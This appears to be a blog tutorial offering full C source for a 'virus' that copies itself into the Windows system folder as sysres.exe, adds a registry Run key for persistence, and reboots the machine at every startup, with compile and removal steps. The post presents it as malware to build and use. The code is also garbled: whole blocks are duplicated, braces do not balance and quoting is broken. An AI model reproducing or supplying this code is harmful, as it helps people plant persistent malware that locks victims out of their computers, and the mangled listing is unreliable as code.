I suppose everyone using Computer might have come across the term Virus but have you ever wondered about creating one?
In this post I will tell you how to create a virus in C that restarts computer on startup
You need to compile the code given in C compiler and make it yours.
Source Code in C ::::::
#include<stdio.h>
#include<dos.h>
#include<dir.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
C:\windows\system\ sysres.exe”); //put this file to registry for starup
break;
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
C:\windows\system\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
D:\windows\system\sysres.exe”);
break;
target=fopen(“D:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
D:\windows\system\sysres.exe”);
break;
case 3:
target=fopen(“E:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
E:\windows\system\sysres.exe”);
break;
target=fopen(“E:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
E:\windows\system\sysres.exe”);
break;
case 4:
target=fopen(“F:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
F:\windows\system\sysres.exe”);
break;
target=fopen(“F:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
F:\windows\system\sysres.exe”);
break;
default:
exit(0);
}
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0?); //if the system is already infected then just give a command to restart
}
system(“shutdown -r -t 0?); //if the system is already infected then just give a command to restart
}
__________________________________________________________________
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto
X:WindowsSystem
(X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:WindowsSystem
3. If not it will just place a copy of itself into X:WindowsSystem and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:WindowsSystem directory(folder), then it just gives a command torestart the computer.
This process is repeated every time the PC is restarted.
0 comments:
Post a Comment